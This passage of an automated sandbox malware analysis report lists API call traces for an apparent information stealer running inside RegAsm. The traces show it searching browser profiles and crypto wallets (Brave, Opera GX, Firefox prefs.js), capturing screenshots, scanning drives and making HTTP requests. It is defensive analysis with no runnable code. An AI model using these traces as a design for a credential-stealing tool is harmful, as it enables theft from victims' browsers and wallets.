                                                                                                          • Part of subcall function 00408DDB: lstrlenA.KERNEL32(?), ref: 00408FEF
                                                                                                          • Part of subcall function 00409549: lstrlenA.KERNEL32(?), ref: 00409970
                                                                                                          • Part of subcall function 00409549: lstrlenA.KERNEL32(?), ref: 0040998B
                                                                                                        • StrCmpCA.SHLWAPI(?), ref: 0040A553
                                                                                                        • CopyFileA.KERNEL32(?,?,00000001,004373A0,00436802), ref: 0040A613
                                                                                                        • DeleteFileA.KERNEL32(?), ref: 0040A6AA
                                                                                                          • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                        • FindNextFileA.KERNEL32(?,?), ref: 0040A76E
                                                                                                        • FindClose.KERNEL32(?), ref: 0040A782
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Filelstrcpylstrlen$Find$CopyDeletelstrcat$CloseFirstNextSystemTime
                                                                                                        • String ID: Brave$Google Chrome$Opera GX$Preferences$\BraveWallet\Preferences

                                                                                                        APIs
                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(6C11F688,00001000), ref: 6C0935D5
                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C0935E0
                                                                                                        • QueryPerformanceFrequency.KERNEL32(?), ref: 6C0935FD
                                                                                                        • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C09363F
                                                                                                        • GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C09369F
                                                                                                        • __aulldiv.LIBCMT ref: 6C0936E4
                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 6C093773
                                                                                                        • EnterCriticalSection.KERNEL32(6C11F688), ref: 6C09377E
                                                                                                        • LeaveCriticalSection.KERNEL32(6C11F688), ref: 6C0937BD
                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 6C0937C4
                                                                                                        • EnterCriticalSection.KERNEL32(6C11F688), ref: 6C0937CB
                                                                                                        • LeaveCriticalSection.KERNEL32(6C11F688), ref: 6C093801
                                                                                                        • __aulldiv.LIBCMT ref: 6C093883
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C093902
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C093918
                                                                                                        • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C09394C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325466692.000000006C091000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C090000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c090000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
                                                                                                        • String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcat$wsprintf$Find$File$CloseFirstMatchNextPathSpec
                                                                                                        • String ID: %s\%s$%s\%s$%s\*
                                                                                                        APIs
                                                                                                        • __EH_prolog3_catch_GS.LIBCMT ref: 0041180E
                                                                                                        • CoInitializeEx.OLE32(00000000,00000000,0000004C,00413EF9,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 0041181F
                                                                                                        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411830
                                                                                                        • CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 0041184A
                                                                                                        • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411880
                                                                                                        • VariantInit.OLEAUT32(?), ref: 004118DB
                                                                                                          • Part of subcall function 00411757: __EH_prolog3_catch.LIBCMT ref: 0041175E
                                                                                                          • Part of subcall function 00411757: CoCreateInstance.OLE32(004331B0,00000000,00000001,0043AF60,?,00000018,00411901,?), ref: 00411781
                                                                                                          • Part of subcall function 00411757: SysAllocString.OLEAUT32(?), ref: 0041178E
                                                                                                          • Part of subcall function 00411757: _wtoi64.MSVCRT ref: 004117C1
                                                                                                          • Part of subcall function 00411757: SysFreeString.OLEAUT32(?), ref: 004117DA
                                                                                                          • Part of subcall function 00411757: SysFreeString.OLEAUT32(00000000), ref: 004117E1
                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 0041190A
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00411916
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0041191D
                                                                                                        • VariantClear.OLEAUT32(?), ref: 0041195C
                                                                                                        • wsprintfA.USER32 ref: 00411949
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: String$AllocCreateFreeHeapInitializeInstanceTimeVariant$BlanketClearFileH_prolog3_catchH_prolog3_catch_InitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
                                                                                                        • String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$Unknown$WQL
                                                                                                        • API String ID: 2280294774-461178377
                                                                                                        • Opcode ID: fe6b9a04deeaae94ce61e149b8f4aed9b6b3574a86b373e3e1773863a37c8a56
                                                                                                        • Instruction ID: 9b83a2dca4a1b3c6c0afd6b9e082c19a49acb0dc1fc89349d09b2b61b6485616
                                                                                                        • Opcode Fuzzy Hash: fe6b9a04deeaae94ce61e149b8f4aed9b6b3574a86b373e3e1773863a37c8a56
                                                                                                        • Instruction Fuzzy Hash: F7418D71940209BBCB20CBD5DC89EEFBBBDEFC9B11F20411AF611A6190D7799941CB28
                                                                                                        APIs
                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                          • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                          • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                        • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
                                                                                                        • StrCmpCA.SHLWAPI(?), ref: 004069DF
                                                                                                        • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
                                                                                                        • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
                                                                                                        • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
                                                                                                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
                                                                                                        • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC
                                                                                                        • InternetReadFile.WININET(?,?,000007CF,?), ref: 00406B40
                                                                                                        • InternetCloseHandle.WININET(?), ref: 00406B50
                                                                                                        • InternetCloseHandle.WININET(?), ref: 00406B5C
                                                                                                        • InternetCloseHandle.WININET(?), ref: 00406B68
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Internet$lstrcpy$CloseHandleHttp$OpenRequestlstrlen$ConnectCrackFileInfoOptionQueryReadSendlstrcat
                                                                                                        • String ID: ERROR$ERROR$GET
                                                                                                        • API String ID: 3863758870-2509457195
                                                                                                        • Opcode ID: f8bbef71df04f966e5d320ec9155bdde9ed9db18ec7c49dd597abc49b73d9854
                                                                                                        • Instruction ID: 58d07afc169a1ce0b47171bb7ce7cc0903f1f08f96176c9b1f2a19a3da15bd67
                                                                                                        • Opcode Fuzzy Hash: f8bbef71df04f966e5d320ec9155bdde9ed9db18ec7c49dd597abc49b73d9854
                                                                                                        • Instruction Fuzzy Hash: 9D51AEB1A00269AFDF20EB60DC84AEEB7B9FB04304F0181B6F549B2190DA755EC59F94
                                                                                                        APIs
                                                                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00411F96
                                                                                                        • GetDesktopWindow.USER32 ref: 00411FA4
                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00411FB1
                                                                                                        • GetDC.USER32(00000000), ref: 00411FB8
                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00411FC1
                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00411FD1
                                                                                                        • SelectObject.GDI32(?,00000000), ref: 00411FDE
                                                                                                        • BitBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 00411FFA
                                                                                                        • GetHGlobalFromStream.COMBASE(?,?), ref: 00412049
                                                                                                        • GlobalLock.KERNEL32(?), ref: 00412052
                                                                                                        • GlobalSize.KERNEL32(?), ref: 0041205E
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                          • Part of subcall function 00405482: lstrlenA.KERNEL32(?), ref: 00405519
                                                                                                          • Part of subcall function 00405482: StrCmpCA.SHLWAPI(?,00436986,0043697B,0043697A,0043696F), ref: 00405588
                                                                                                          • Part of subcall function 00405482: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004055AA
                                                                                                        • SelectObject.GDI32(?,?), ref: 004120BC
                                                                                                        • DeleteObject.GDI32(?), ref: 004120D7
                                                                                                        • DeleteObject.GDI32(?), ref: 004120E0
                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 004120E8
                                                                                                        • CloseWindow.USER32(00000000), ref: 004120EF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: GlobalObject$CreateWindow$CompatibleDeleteSelectStreamlstrcpy$BitmapCloseDesktopFromInternetLockOpenRectReleaseSizelstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 2610876673-0
                                                                                                        • Opcode ID: bda296b1393527d1300f5fae4d52867722602398b487228bc4e84d997ee74abd
                                                                                                        • Instruction ID: f6e3f0428e96004f8b83f7710fafbd9962f3d673da3a1d35a18d8dcfea6c860f
                                                                                                        • Opcode Fuzzy Hash: bda296b1393527d1300f5fae4d52867722602398b487228bc4e84d997ee74abd
                                                                                                        • Instruction Fuzzy Hash: 0251EA72800218AFDF15EFA1ED498EE7FBAFF08319F045525F901E2120E7369A55DB61
                                                                                                        APIs
                                                                                                        • wsprintfA.USER32 ref: 0041546A
                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 00415481
                                                                                                        • StrCmpCA.SHLWAPI(?,00436A80), ref: 004154A2
                                                                                                        • StrCmpCA.SHLWAPI(?,00436A84), ref: 004154BC
                                                                                                        • lstrcatA.KERNEL32(?), ref: 0041550D
                                                                                                        • lstrcatA.KERNEL32(?), ref: 00415520
                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00415534
                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00415547
                                                                                                        • lstrcatA.KERNEL32(?,00436A88), ref: 00415559
                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 0041556D
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                          • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                          • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                          • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                          • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                          • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                          • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                          • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                        • FindNextFileA.KERNEL32(?,?), ref: 00415623
                                                                                                        • FindClose.KERNEL32(?), ref: 00415637
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcat$File$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitlstrcpywsprintf
                                                                                                        • String ID: %s\%s
                                                                                                        • API String ID: 1150833511-4073750446
                                                                                                        • Opcode ID: 2e0bb3d38ea62b5c105b61d514d6becb3cb91e1da354d02d3ddcedb69e666a60
                                                                                                        • Instruction ID: 7b4a02d1ce16c29d0e311cc455c9dd4e2592c9f450b56a316f79c40a9e4a8b0e
                                                                                                        • Opcode Fuzzy Hash: 2e0bb3d38ea62b5c105b61d514d6becb3cb91e1da354d02d3ddcedb69e666a60
                                                                                                        • Instruction Fuzzy Hash: 71515FB190021D9BCF64DF60CC89AC9B7BDAB48305F1045E6E609E3250EB369B89CF65
                                                                                                        APIs
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                        • FindFirstFileA.KERNEL32(?,?,\*.*,0043682E,0040CC6B,?,?), ref: 0040BFC5
                                                                                                        • StrCmpCA.SHLWAPI(?,00437470), ref: 0040BFE5
                                                                                                        • StrCmpCA.SHLWAPI(?,00437474), ref: 0040BFFF
                                                                                                        • StrCmpCA.SHLWAPI(?,Opera,00436843,00436842,00436837,00436836,00436833,00436832,0043682F), ref: 0040C08B
                                                                                                        • StrCmpCA.SHLWAPI(?,Opera GX), ref: 0040C099
                                                                                                        • StrCmpCA.SHLWAPI(?,Opera Crypto), ref: 0040C0A7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                                        • String ID: Opera$Opera Crypto$Opera GX$\*.*
                                                                                                        • API String ID: 2567437900-1710495004
                                                                                                        • Opcode ID: aa36165faac966798846ca3c9bce9657deccde8570b813cc5940d77252a91f8b
                                                                                                        • Instruction ID: c4b769843fd96ba5a9993bec0907288b27e6520762e28c1f4f52d27b6ca0eed4
                                                                                                        • Opcode Fuzzy Hash: aa36165faac966798846ca3c9bce9657deccde8570b813cc5940d77252a91f8b
                                                                                                        • Instruction Fuzzy Hash: 0E021D71A401299BCF21FB26DD466CD7775AF14308F4111EAB948B3191DBB86FC98F88
                                                                                                        APIs
                                                                                                        • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004151C2
                                                                                                        • _memset.LIBCMT ref: 004151E5
                                                                                                        • GetDriveTypeA.KERNEL32(?), ref: 004151EE
                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 0041520E
                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00415229
                                                                                                          • Part of subcall function 00414CC8: wsprintfA.USER32 ref: 00414D1C
                                                                                                          • Part of subcall function 00414CC8: FindFirstFileA.KERNEL32(?,?), ref: 00414D33
                                                                                                          • Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414D4F
                                                                                                          • Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414D60
                                                                                                          • Part of subcall function 00414CC8: StrCmpCA.SHLWAPI(?,004369F8), ref: 00414D81
                                                                                                          • Part of subcall function 00414CC8: StrCmpCA.SHLWAPI(?,004369FC), ref: 00414D9B
                                                                                                          • Part of subcall function 00414CC8: wsprintfA.USER32 ref: 00414DC2
                                                                                                          • Part of subcall function 00414CC8: StrCmpCA.SHLWAPI(?,0043660F), ref: 00414DD6
                                                                                                          • Part of subcall function 00414CC8: wsprintfA.USER32 ref: 00414DFF
                                                                                                          • Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414E28
                                                                                                          • Part of subcall function 00414CC8: lstrcatA.KERNEL32(?,?), ref: 00414E3D
                                                                                                        • lstrcpyA.KERNEL32(?,00000000), ref: 0041524A
                                                                                                        • lstrlenA.KERNEL32(?), ref: 004152C4
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _memset$lstrcpywsprintf$Drive$FileFindFirstLogicalStringsTypelstrcatlstrlen
                                                                                                        • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
                                                                                                        • API String ID: 441469471-147700698
                                                                                                        • Opcode ID: c6a03fd65228155c95557e0964fe3535a0c6996c33cf50c77044e9ee4d403a5c
                                                                                                        • Instruction ID: 002cc7b8fd832fc02ac953dee8a9373947a5751985c47ec76440b2e4c0201c02
                                                                                                        • Opcode Fuzzy Hash: c6a03fd65228155c95557e0964fe3535a0c6996c33cf50c77044e9ee4d403a5c
                                                                                                        • Instruction Fuzzy Hash: 1B512DB190021CAFDF219FA1CC85BDA7BB9FB09304F1041AAEA48A7111E7355E89CF59
                                                                                                        APIs
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                        • FindFirstFileA.KERNEL32(?,?,0043A9AC,0043A9B0,004369FA,004369F7,00417908,?,00000000), ref: 00401FA4
                                                                                                        • StrCmpCA.SHLWAPI(?,0043A9B4), ref: 00401FD7
                                                                                                        • StrCmpCA.SHLWAPI(?,0043A9B8), ref: 00401FF1
                                                                                                        • FindFirstFileA.KERNEL32(?,?,0043A9BC,0043A9C0,?,0043A9C4,004369FB), ref: 004020DD
                                                                                                          • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                        • FindNextFileA.KERNEL32(?,?), ref: 004023A2
                                                                                                        • FindClose.KERNEL32(?), ref: 004023B6
                                                                                                        • FindNextFileA.KERNEL32(?,?), ref: 004026C6
                                                                                                        • FindClose.KERNEL32(?), ref: 004026DA
                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                          • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                          • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                          • Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99
                                                                                                          • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                          • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                          • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                          • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                          • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                          • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                          • Part of subcall function 00416E97: Sleep.KERNEL32(000003E8,?,?), ref: 00416EFE
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: File$Find$lstrcpy$Close$CreateFirstNextlstrcat$AllocAttributesFolderHandleLocalObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
                                                                                                        • String ID: \*.*
                                                                                                        • API String ID: 1116797323-1173974218
                                                                                                        • Opcode ID: 4a5b137c999928a75ba8bc4a6e6ab310dcd69db191c9960b432ed123b9b006a7
                                                                                                        • Instruction ID: 84c523e9d2ff6d0b2cceb644b0baa1646f1dc192954122ea0c18f52f03966360
                                                                                                        • Opcode Fuzzy Hash: 4a5b137c999928a75ba8bc4a6e6ab310dcd69db191c9960b432ed123b9b006a7
                                                                                                        • Instruction Fuzzy Hash: 6C32EC71A401299BCF21FB25DD4A6CD7375AF04308F5100EAB548B71A1DBB86FC98F99
                                                                                                        APIs
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                        • FindFirstFileA.KERNEL32(?,?,00437570,004368A3,?,?,?), ref: 0040D647
                                                                                                        • StrCmpCA.SHLWAPI(?,00437574), ref: 0040D668
                                                                                                        • StrCmpCA.SHLWAPI(?,00437578), ref: 0040D682
                                                                                                        • StrCmpCA.SHLWAPI(?,prefs.js,0043757C,?,004368AE), ref: 0040D70E
                                                                                                          • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                        • CopyFileA.KERNEL32(?,?,00000001,0043758C,004368AF), ref: 0040D7E8
                                                                                                        • DeleteFileA.KERNEL32(?), ref: 0040D8B3
                                                                                                        • FindNextFileA.KERNELBASE(?,?), ref: 0040D956
                                                                                                        • FindClose.KERNEL32(?), ref: 0040D96A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextSystemTimelstrlen
                                                                                                        • String ID: prefs.js
                                                                                                        • API String ID: 893096357-3783873740
                                                                                                        • Opcode ID: 41633527efff258655262d476ebd01a72874a665415db562b1b65d312d844474
                                                                                                        • Instruction ID: 927356911e44c3405f4de0d2be1bd74ddf2f7452577bbc1ac17ea627ea54bfb8
                                                                                                        • Opcode Fuzzy Hash: 41633527efff258655262d476ebd01a72874a665415db562b1b65d312d844474
                                                                                                        • Instruction Fuzzy Hash: 38A11C71D001289BCF60FB65DD46BCD7375AF04318F4101EAA808B7292DB79AEC98F99
                                                                                                        APIs
